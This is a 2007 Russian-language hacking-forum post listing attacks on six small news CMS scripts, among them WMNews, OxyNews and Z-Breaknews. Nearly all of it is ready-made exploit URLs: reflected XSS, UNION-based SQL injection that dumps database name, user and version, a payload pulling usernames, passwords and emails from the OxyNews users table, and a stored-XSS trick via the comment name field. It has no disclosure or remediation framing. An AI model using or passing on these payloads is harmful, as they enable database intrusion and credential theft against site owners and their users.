|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Новостные двиги:
1. WMNews Версия 0.2
Пасивная XSS:
Код:
http://site.ru/footer.php?site_title=<script>alert();</script>
--------------------
2. BGDev News 0.1
SQL инъекция:
Код:
http://site.ru/news_comments.php?id='+union+select+1,2,3,4,5,6,7,8,9/*
--------------------
3. Z-Breaknews 0.1
SQL инъекция:
Код:
http://site.ru/single.php?id=-1+union+select+1,2,3,4/*
http://site.ru/single.php?id=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4/*
--------------------
4. OxyNews 0.4
SQL инъекция:
Код:
http://site.ru/index.php?oxynews_comment_id=-1+union+select+1,2,3,4,5,6,7,8/*
Вывод логина, пароля и мыла пользователя:
Код:
http://site.ru/index.php?oxynews_comment_id=-1+union+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8+from+oxynews_users/*
--------------------
5. NP v1.1.0
SQL инъекция:
Код:
http://site.ru/view.php?id=-1+union+select+1,2,3,4,5/*
http://site.ru/view.php?id=-1+union+select+convert(concat(database(),char(58),user(),char(58),version()),char),2,3,4,5/*
--------------------
6. Somery 0.4-105
Активная XSS:
При добавление комментария в поле name вписываем скрипт. Скрипт будет выполняться при просмотре комментариев.
Последний раз редактировалось Grey; 27.04.2007 в 18:09..
|